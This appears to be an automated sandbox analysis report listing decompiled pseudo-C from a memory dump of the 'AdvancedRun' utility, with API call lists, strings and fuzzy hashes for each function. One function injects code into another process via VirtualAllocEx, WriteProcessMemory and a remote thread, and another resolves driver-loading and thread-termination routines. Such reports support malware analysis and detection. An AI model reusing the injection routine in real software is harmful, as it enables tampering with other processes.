                                                                                      				_v33348 = _t87;
                                                                                      				if(_t140 != 0) {
                                                                                      					_t126 = 0x11;
                                                                                      					memcpy( &_v33420, _t140, _t126 << 2);
                                                                                      					_t148 = _t148 + 0xc;
                                                                                      				}
                                                                                      				_v33420 = 0x44;
                                                                                      				if(_a16 == 0) {
                                                                                      					_v33336 = 1;
                                                                                      				} else {
                                                                                      					E00404923(0x2000,  &_v33336, _a16);
                                                                                      				}
                                                                                      				if(_a12 == 0) {
                                                                                      					_v16950 = 1;
                                                                                      				} else {
                                                                                      					E00404923(0x2000,  &_v16950, _a12);
                                                                                      				}
                                                                                      				if(_a24 == 0) {
                                                                                      					_v564 = 1;
                                                                                      				} else {
                                                                                      					E00404923(0x104,  &_v564, _a24);
                                                                                      				}
                                                                                      				_v24 = _a20;
                                                                                      				_v28 = 0;
                                                                                      				_a16 = VirtualAllocEx(_a8, 0, 0x8288, 0x1000, 4);
                                                                                      				_t90 = VirtualAllocEx(_a8, 0, 0x800, 0x1000, 0x40);
                                                                                      				_a12 = _t90;
                                                                                      				if(_a16 == 0 || _t90 == 0) {
                                                                                      					 *_a4 = GetLastError();
                                                                                      				} else {
                                                                                      					WriteProcessMemory(_a8, _t90, E0040A3DC, 0x800, 0);
                                                                                      					WriteProcessMemory(_a8, _a16,  &_v33436, 0x8288, 0);
                                                                                      					_v20 = 0;
                                                                                      					_v16 = 0;
                                                                                      					_a24 = 0;
                                                                                      					_t144 = E0040A272( &_v20, _a8, _a12, _a16,  &_a24);
                                                                                      					_a28 = _t144;
                                                                                      					if(_t144 == 0) {
                                                                                      						 *_a4 = GetLastError();
                                                                                      					} else {
                                                                                      						ResumeThread(_t144);
                                                                                      						WaitForSingleObject(_t144, 0x7d0);
                                                                                      						CloseHandle(_t144);
                                                                                      					}
                                                                                      					_v66852 = 0;
                                                                                      					memset( &_v66848, 0, 0x8284);
                                                                                      					ReadProcessMemory(_a8, _a16,  &_v66852, 0x8288, 0);
                                                                                      					VirtualFreeEx(_a8, _a16, 0, 0x8000);
                                                                                      					VirtualFreeEx(_a8, _a12, 0, 0x8000);
                                                                                      					if(_a28 != 0) {
                                                                                      						 *_a4 = _v66756;
                                                                                      						_v12 = _v66760;
                                                                                      						if(_a32 != 0) {
                                                                                      							asm("movsd");
                                                                                      							asm("movsd");
                                                                                      							asm("movsd");
                                                                                      							asm("movsd");
                                                                                      						}
                                                                                      					}
                                                                                      					if(_v20 != 0) {
                                                                                      						FreeLibrary(_v20);
                                                                                      					}
                                                                                      				}
                                                                                      				goto L30;
                                                                                      			}


                                                                                      APIs
                                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,00000000,?,00402225,?,00000000,?,?,?,?,?,?), ref: 0040A48F
                                                                                      • memset.MSVCRT ref: 0040A4B3
                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040A4C0
                                                                                        • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                        • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                        • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                        • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                        • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CE4
                                                                                        • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CF1
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 0040A4EA
                                                                                      • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040A50B
                                                                                      • VirtualAllocEx.KERNEL32(?,00000000,00008288,00001000,00000004), ref: 0040A5BA
                                                                                      • VirtualAllocEx.KERNEL32(?,00000000,00000800,00001000,00000040), ref: 0040A5CF
                                                                                      • WriteProcessMemory.KERNEL32(?,00000000,0040A3DC,00000800,00000000), ref: 0040A5FA
                                                                                      • WriteProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A60B
                                                                                      • ResumeThread.KERNEL32(00000000,?,?,?,?), ref: 0040A635
                                                                                      • WaitForSingleObject.KERNEL32(00000000,000007D0), ref: 0040A641
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040A648
                                                                                      • memset.MSVCRT ref: 0040A66E
                                                                                      • ReadProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A685
                                                                                      • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A69E
                                                                                      • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A6A8
                                                                                      • FreeLibrary.KERNEL32(?), ref: 0040A6DC
                                                                                      • GetLastError.KERNEL32 ref: 0040A6E4
                                                                                      • GetLastError.KERNEL32(?,00402225,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040A6F1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: AddressHandleProcProcessVirtual$FreeMemoryModule$AllocErrorLastWritememsetstrlen$CloseLibraryObjectOpenReadResumeSingleThreadWait
                                                                                      • String ID: CreateProcessW$D$GetLastError$kernel32.dll
                                                                                      • API String ID: 1572607441-20550370
                                                                                      • Opcode ID: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                      • Instruction ID: 438c2ff444ec8f0d87d8749b995af300a635889f814f068fc812e1417cff7fa3
                                                                                      • Opcode Fuzzy Hash: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                      • Instruction Fuzzy Hash: 557127B1800219EFCB109FA0DD8499E7BB5FF08344F14457AF949B6290CB799E90DF59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 85%
                                                                                      			E00401093(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
                                                                                      				struct tagPOINT _v12;
                                                                                      				void* __esi;
                                                                                      				void* _t47;
                                                                                      				struct HBRUSH__* _t56;
                                                                                      				void* _t61;
                                                                                      				unsigned int _t63;
                                                                                      				void* _t68;
                                                                                      				struct HWND__* _t69;
                                                                                      				struct HWND__* _t70;
                                                                                      				void* _t73;
                                                                                      				unsigned int _t74;
                                                                                      				struct HWND__* _t76;
                                                                                      				struct HWND__* _t77;
                                                                                      				struct HWND__* _t78;
                                                                                      				struct HWND__* _t79;
                                                                                      				unsigned int _t85;
                                                                                      				struct HWND__* _t87;
                                                                                      				struct HWND__* _t89;
                                                                                      				struct HWND__* _t90;
                                                                                      				struct tagPOINT _t96;
                                                                                      				struct tagPOINT _t98;
                                                                                      				signed short _t103;
                                                                                      				void* _t106;
                                                                                      				void* _t117;
                                                                                      
                                                                                      				_t106 = __edx;
                                                                                      				_push(__ecx);
                                                                                      				_push(__ecx);
                                                                                      				_t47 = _a4 - 0x110;
                                                                                      				_t117 = __ecx;
                                                                                      				if(_t47 == 0) {
                                                                                      					__eflags =  *0x40feb0;
                                                                                      					if(__eflags != 0) {
                                                                                      						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x40feb0);
                                                                                      					} else {
                                                                                      						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
                                                                                      						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
                                                                                      					}
                                                                                      					SetWindowTextW( *(_t117 + 0x10), L"AdvancedRun");
                                                                                      					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
                                                                                      					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
                                                                                      					E0040103E(_t117, __eflags);
                                                                                      					E00404DA9(_t106,  *(_t117 + 0x10), 4);
                                                                                      					goto L30;
                                                                                      				} else {
                                                                                      					_t61 = _t47 - 1;
                                                                                      					if(_t61 == 0) {
                                                                                      						_t103 = _a8;
                                                                                      						_t63 = _t103 >> 0x10;
                                                                                      						__eflags = _t103 - 1;
                                                                                      						if(_t103 == 1) {
                                                                                      							L24:
                                                                                      							__eflags = _t63;
                                                                                      							if(_t63 != 0) {
                                                                                      								goto L30;
                                                                                      							} else {
                                                                                      								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
                                                                                      								DeleteObject( *(_t117 + 0x43c));
                                                                                      								goto L8;
                                                                                      							}
                                                                                      						} else {
                                                                                      							__eflags = _t103 - 2;
                                                                                      							if(_t103 != 2) {
                                                                                      								goto L30;
                                                                                      							} else {
                                                                                      								goto L24;
                                                                                      							}
                                                                                      						}
                                                                                      					} else {
                                                                                      						_t68 = _t61 - 0x27;
                                                                                      						if(_t68 == 0) {
                                                                                      							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                      							__eflags = _a12 - _t69;
                                                                                      							if(_a12 != _t69) {
                                                                                      								__eflags =  *0x40ff30;
                                                                                      								if( *0x40ff30 == 0) {
                                                                                      									goto L30;
                                                                                      								} else {
                                                                                      									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                                      									__eflags = _a12 - _t70;
                                                                                      									if(_a12 != _t70) {
                                                                                      										goto L30;
                                                                                      									} else {
                                                                                      										goto L18;
                                                                                      									}
                                                                                      								}
                                                                                      							} else {
                                                                                      								L18:
                                                                                      								SetBkMode(_a8, 1);
                                                                                      								SetTextColor(_a8, 0xc00000);
                                                                                      								_t56 = GetSysColorBrush(0xf);
                                                                                      							}
                                                                                      						} else {
                                                                                      							_t73 = _t68 - 0xc8;
                                                                                      							if(_t73 == 0) {
                                                                                      								_t74 = _a12;
                                                                                      								_t96 = _t74 & 0x0000ffff;
                                                                                      								_v12.x = _t96;
                                                                                      								_v12.y = _t74 >> 0x10;
                                                                                      								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                      								_push(_v12.y);
                                                                                      								_a8 = _t76;
                                                                                      								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
                                                                                      								__eflags = _t77 - _a8;
                                                                                      								if(_t77 != _a8) {
                                                                                      									__eflags =  *0x40ff30;
                                                                                      									if( *0x40ff30 == 0) {
                                                                                      										goto L30;
                                                                                      									} else {
                                                                                      										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                                      										_push(_v12.y);
                                                                                      										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
                                                                                      										__eflags = _t79 - _t78;
                                                                                      										if(_t79 != _t78) {
                                                                                      											goto L30;
                                                                                      										} else {
                                                                                      											goto L13;
                                                                                      										}
                                                                                      									}
                                                                                      								} else {
                                                                                      									L13:
                                                                                      									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
                                                                                      									goto L8;
                                                                                      								}
                                                                                      							} else {
                                                                                      								if(_t73 != 0) {
                                                                                      									L30:
                                                                                      									_t56 = 0;
                                                                                      									__eflags = 0;
                                                                                      								} else {
                                                                                      									_t85 = _a12;
                                                                                      									_t98 = _t85 & 0x0000ffff;
                                                                                      									_v12.x = _t98;
                                                                                      									_v12.y = _t85 >> 0x10;
                                                                                      									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                      									_push(_v12.y);
                                                                                      									_a8 = _t87;
                                                                                      									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
                                                                                      										__eflags =  *0x40ff30;
                                                                                      										if( *0x40ff30 == 0) {
                                                                                      											goto L30;
                                                                                      										} else {
                                                                                      											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                                      											_push(_v12.y);
                                                                                      											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
                                                                                      											__eflags = _t90 - _t89;
                                                                                      											if(_t90 != _t89) {
                                                                                      												goto L30;
                                                                                      											} else {
                                                                                      												_push(0x40ff30);
                                                                                      												goto L7;
                                                                                      											}
                                                                                      										}
                                                                                      									} else {
                                                                                      										_push(_t117 + 0x23e);
                                                                                      										L7:
                                                                                      										_push( *(_t117 + 0x10));
                                                                                      										E00404F7E();
                                                                                      										L8:
                                                                                      										_t56 = 1;
                                                                                      									}
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      				return _t56;
                                                                                      			}



























                                                                                      0x00401151
                                                                                      0x0040115a
                                                                                      0x00401168
                                                                                      0x0040116b
                                                                                      0x0040116e
                                                                                      0x00401170
                                                                                      0x00401173
                                                                                      0x00401180
                                                                                      0x00401182
                                                                                      0x00401185
                                                                                      0x004011a4
                                                                                      0x004011ac
                                                                                      0x00000000
                                                                                      0x004011b2
                                                                                      0x004011ba
                                                                                      0x004011bc
                                                                                      0x004011c7
                                                                                      0x004011c9
                                                                                      0x004011cb
                                                                                      0x00000000
                                                                                      0x004011d1
                                                                                      0x00000000
                                                                                      0x004011d1
                                                                                      0x004011cb
                                                                                      0x00401187
                                                                                      0x00401187
                                                                                      0x00401199
                                                                                      0x00000000
                                                                                      0x00401199
                                                                                      0x004010c6
                                                                                      0x004010c8
                                                                                      0x004012fd
                                                                                      0x004012fd
                                                                                      0x004012fd
                                                                                      0x004010ce
                                                                                      0x004010ce
                                                                                      0x004010d7
                                                                                      0x004010e5
                                                                                      0x004010e8
                                                                                      0x004010eb
                                                                                      0x004010ed
                                                                                      0x004010f0
                                                                                      0x00401102
                                                                                      0x0040111d
                                                                                      0x00401125
                                                                                      0x00000000
                                                                                      0x0040112b
                                                                                      0x00401133
                                                                                      0x00401135
                                                                                      0x00401140
                                                                                      0x00401142
                                                                                      0x00401144
                                                                                      0x00000000
                                                                                      0x0040114a
                                                                                      0x0040114a
                                                                                      0x00000000
                                                                                      0x0040114a
                                                                                      0x00401144
                                                                                      0x00401104
                                                                                      0x0040110a
                                                                                      0x0040110b
                                                                                      0x0040110b
                                                                                      0x0040110e
                                                                                      0x00401115
                                                                                      0x00401117
                                                                                      0x00401117
                                                                                      0x00401102
                                                                                      0x004010c8
                                                                                      0x004010c0
                                                                                      0x004010b5
                                                                                      0x004010ac
                                                                                      0x00401303

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                      • String ID: AdvancedRun
                                                                                      • API String ID: 829165378-481304740
                                                                                      • Opcode ID: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                      • Instruction ID: 224fbb10fd18d8c83ffedf6f1f5ae1765c75c0bde1a98b5884793aa0480d770d
                                                                                      • Opcode Fuzzy Hash: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                      • Instruction Fuzzy Hash: 12517D31510308EBDB216FA0DD84E6A7BB6FB44304F104A3AFA11B65F1CB79A954EB18
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00408E31() {
                                                                                      				void* _t1;
                                                                                      				struct HINSTANCE__* _t2;
                                                                                      				_Unknown_base(*)()* _t14;
                                                                                      
                                                                                      				if( *0x41c4ac == 0) {
                                                                                      					_t2 = GetModuleHandleW(L"ntdll.dll");
                                                                                      					 *0x41c4ac = _t2;
                                                                                      					 *0x41c47c = GetProcAddress(_t2, "NtQuerySystemInformation");
                                                                                      					 *0x41c480 = GetProcAddress( *0x41c4ac, "NtLoadDriver");
                                                                                      					 *0x41c484 = GetProcAddress( *0x41c4ac, "NtUnloadDriver");
                                                                                      					 *0x41c488 = GetProcAddress( *0x41c4ac, "NtOpenSymbolicLinkObject");
                                                                                      					 *0x41c48c = GetProcAddress( *0x41c4ac, "NtQuerySymbolicLinkObject");
                                                                                      					 *0x41c490 = GetProcAddress( *0x41c4ac, "NtQueryObject");
                                                                                      					 *0x41c494 = GetProcAddress( *0x41c4ac, "NtOpenThread");
                                                                                      					 *0x41c498 = GetProcAddress( *0x41c4ac, "NtClose");
                                                                                      					 *0x41c49c = GetProcAddress( *0x41c4ac, "NtQueryInformationThread");
                                                                                      					 *0x41c4a0 = GetProcAddress( *0x41c4ac, "NtSuspendThread");
                                                                                      					 *0x41c4a4 = GetProcAddress( *0x41c4ac, "NtResumeThread");
                                                                                      					_t14 = GetProcAddress( *0x41c4ac, "NtTerminateThread");
                                                                                      					 *0x41c4a8 = _t14;
                                                                                      					return _t14;
                                                                                      				}
                                                                                      				return _t1;
                                                                                      			}







                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                      • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                      • GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                      • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                      • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                      • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                      • GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                      • GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                      • GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                      • GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                      • GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                      • GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                      • GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: AddressProc$HandleModule
                                                                                      • String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
                                                                                      • API String ID: 667068680-4280973841
                                                                                      • Opcode ID: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                      • Instruction ID: 9046f7da5280d7be643cb990a4133c03c86fae9b85e8e19c009a309f84c5646f
                                                                                      • Opcode Fuzzy Hash: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                      • Instruction Fuzzy Hash: 6611AD74DC8315EECB516FB1BCE9AA67E61EB08760710C437A809632B1D77A8018DF4C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 45%
                                                                                      			E00408ADB(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
                                                                                      				void _v259;
                                                                                      				void _v260;
                                                                                      				void _v515;
                                                                                      				void _v516;
                                                                                      				char _v1048;
                                                                                      				void _v1052;
                                                                                      				void _v1056;
                                                                                      				void _v1560;
                                                                                      				long _v1580;
                                                                                      				void _v3626;
                                                                                      				char _v3628;
                                                                                      				void _v5674;
                                                                                      				char _v5676;
                                                                                      				void _v9770;
                                                                                      				short _v9772;
                                                                                      				void* __edi;
                                                                                      				void* _t45;
                                                                                      				void* _t60;
                                                                                      				int _t61;
                                                                                      				int _t63;
                                                                                      				int _t64;
                                                                                      				long _t68;
                                                                                      				struct HWND__* _t94;
                                                                                      				signed int _t103;
                                                                                      				intOrPtr _t127;
                                                                                      				unsigned int _t130;
                                                                                      				void* _t132;
                                                                                      				void* _t135;
                                                                                      
                                                                                      				E0040B550(0x2628, __ecx);
                                                                                      				_t45 = _a8 - 0x110;
                                                                                      				if(_t45 == 0) {
                                                                                      					E00404DA9(__edx, _a4, 4);
                                                                                      					_v9772 = 0;
                                                                                      					memset( &_v9770, 0, 0xffe);
                                                                                      					_t103 = 5;
                                                                                      					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
                                                                                      					memset( &_v1560, 0, 0x1f6);
                                                                                      					_v260 = 0;
                                                                                      					memset( &_v259, 0, 0xff);
                                                                                      					_v516 = 0;
                                                                                      					memset( &_v515, 0, 0xff);
                                                                                      					_v5676 = 0;
                                                                                      					memset( &_v5674, 0, 0x7fe);
                                                                                      					_v3628 = 0;
                                                                                      					memset( &_v3626, 0, 0x7fe);
                                                                                      					_t135 = _t132 + 0x5c;
                                                                                      					_t60 = GetCurrentProcess();
                                                                                      					_t105 =  &_v260;
                                                                                      					_a8 = _t60;
                                                                                      					_t61 = ReadProcessMemory(_t60,  *0x40f3bc,  &_v260, 0x80, 0);
                                                                                      					__eflags = _t61;
                                                                                      					if(_t61 != 0) {
                                                                                      						E00404FE0( &_v5676,  &_v260, 4);
                                                                                      						_pop(_t105);
                                                                                      					}
                                                                                      					_t63 = ReadProcessMemory(_a8,  *0x40f3b0,  &_v516, 0x80, 0);
                                                                                      					__eflags = _t63;
                                                                                      					if(_t63 != 0) {
                                                                                      						E00404FE0( &_v3628,  &_v516, 0);
                                                                                      						_pop(_t105);
                                                                                      					}
                                                                                      					_t64 = E00404BD3();
                                                                                      					__eflags = _t64;
                                                                                      					if(_t64 == 0) {
                                                                                      						E004090EE();
                                                                                      					} else {
                                                                                      						E00409172();
                                                                                      					}
                                                                                      					__eflags =  *0x4101b8;
                                                                                      					if(__eflags != 0) {
                                                                                      						L17:
                                                                                      						_v1056 = 0;
                                                                                      						memset( &_v1052, 0, 0x218);
                                                                                      						_t127 =  *0x40f5d4; // 0x0
                                                                                      						_t135 = _t135 + 0xc;
                                                                                      						_t68 = GetCurrentProcessId();
                                                                                      						_push(_t127);
                                                                                      						_push(_t68);
                                                                                      						 *0x40f84c = 0;
                                                                                      						E004092F0(_t105, __eflags);
                                                                                      						__eflags =  *0x40f84c; // 0x0
                                                                                      						if(__eflags != 0) {
                                                                                      							memcpy( &_v1056, 0x40f850, 0x21c);
                                                                                      							_t135 = _t135 + 0xc;
                                                                                      							__eflags =  *0x40f84c; // 0x0
                                                                                      							if(__eflags != 0) {
                                                                                      								wcscpy( &_v1580, E00404B3E( &_v1048));
                                                                                      							}
                                                                                      						}
                                                                                      						goto L20;
                                                                                      					} else {
                                                                                      						__eflags =  *0x4101bc;
                                                                                      						if(__eflags == 0) {
                                                                                      							L20:
                                                                                      							_push( &_v3628);
                                                                                      							_push( &_v5676);
                                                                                      							_push( *0x40f3b0);
                                                                                      							_push( *0x40f3bc);
                                                                                      							_push( *0x40f3ac);
                                                                                      							_push( *0x40f394);
                                                                                      							_push( *0x40f398);
                                                                                      							_push( *0x40f3a0);
                                                                                      							_push( *0x40f3a4);
                                                                                      							_push( *0x40f39c);
                                                                                      							_push( *0x40f3a8);
                                                                                      							_push( &_v1580);
                                                                                      							_push( *0x40f5d4);
                                                                                      							_push( *0x40f5c8);
                                                                                      							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
                                                                                      							_push(0x800);
                                                                                      							_push( &_v9772);
                                                                                      							L0040B1EC();
                                                                                      							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
                                                                                      							SetFocus(GetDlgItem(_a4, 0x3ea));
                                                                                      							L21:
                                                                                      							return 0;
                                                                                      						}
                                                                                      						goto L17;
                                                                                      					}
                                                                                      				}
                                                                                      				if(_t45 == 1) {
                                                                                      					_t130 = _a12;
                                                                                      					if(_t130 >> 0x10 == 0) {
                                                                                      						if(_t130 == 3) {
                                                                                      							_t94 = GetDlgItem(_a4, 0x3ea);
                                                                                      							_a4 = _t94;
                                                                                      							SendMessageW(_t94, 0xb1, 0, 0xffff);
                                                                                      							SendMessageW(_a4, 0x301, 0, 0);
                                                                                      							SendMessageW(_a4, 0xb1, 0, 0);
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      				goto L21;
                                                                                      			}

                                                                                      APIs
                                                                                      Strings
                                                                                      • {Unknown}, xrefs: 00408BA5
                                                                                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00408D85
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                      • API String ID: 4111938811-1819279800
                                                                                      • Opcode ID: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                      • Instruction ID: 89cdabe1f300c5598f457b205db6f7bf21b56caa474a1127ebd0a37068e91017
                                                                                      • Opcode Fuzzy Hash: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                      • Instruction Fuzzy Hash: FD7184B280021DBEDB219B51DD85EDB377CEF08354F0444BAFA08B6191DB799E848F68
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 82%
                                                                                      			E0040B04D(intOrPtr* __edi, short* _a4) {
                                                                                      				int _v8;
                                                                                      				void* _v12;
                                                                                      				void* _v16;
                                                                                      				int _v20;
                                                                                      				long _v60;
                                                                                      				char _v572;
                                                                                      				void* __esi;
                                                                                      				int _t47;
                                                                                      				void* _t50;
                                                                                      				signed short* _t76;
                                                                                      				void* _t81;
                                                                                      				void* _t84;
                                                                                      				intOrPtr* _t96;
                                                                                      				int _t97;
                                                                                      
                                                                                      				_t96 = __edi;
                                                                                      				_t97 = 0;
                                                                                      				_v20 = 0;
                                                                                      				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
                                                                                      				_v8 = _t47;
                                                                                      				if(_t47 > 0) {
                                                                                      					_t50 = E00405AA7(__edi);
                                                                                      					_push(_v8);
                                                                                      					L0040B26C();
                                                                                      					_t84 = _t50;
                                                                                      					GetFileVersionInfoW(_a4, 0, _v8, _t84);
                                                                                      					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
                                                                                      						_t81 = _v12;
                                                                                      						_t11 = _t81 + 0x30; // 0x4d46e853
                                                                                      						 *((intOrPtr*)(__edi + 4)) =  *_t11;
                                                                                      						_t13 = _t81 + 8; // 0x8d50ffff
                                                                                      						 *__edi =  *_t13;
                                                                                      						_t14 = _t81 + 0x14; // 0x5900004d
                                                                                      						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
                                                                                      						_t16 = _t81 + 0x10; // 0x65e850ff
                                                                                      						 *((intOrPtr*)(__edi + 8)) =  *_t16;
                                                                                      						_t18 = _t81 + 0x24; // 0xf4680000
                                                                                      						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
                                                                                      						_t20 = _t81 + 0x28; // 0xbb0040cd
                                                                                      						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
                                                                                      					}
                                                                                      					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
                                                                                      						L5:
                                                                                      						wcscpy( &_v60, L"040904E4");
                                                                                      					} else {
                                                                                      						_t76 = _v16;
                                                                                      						_push(_t76[1] & 0x0000ffff);
                                                                                      						_push( *_t76 & 0x0000ffff);
                                                                                      						_push(L"%4.4X%4.4X");
                                                                                      						_push(0x14);
                                                                                      						_push( &_v60);
                                                                                      						L0040B1EC();
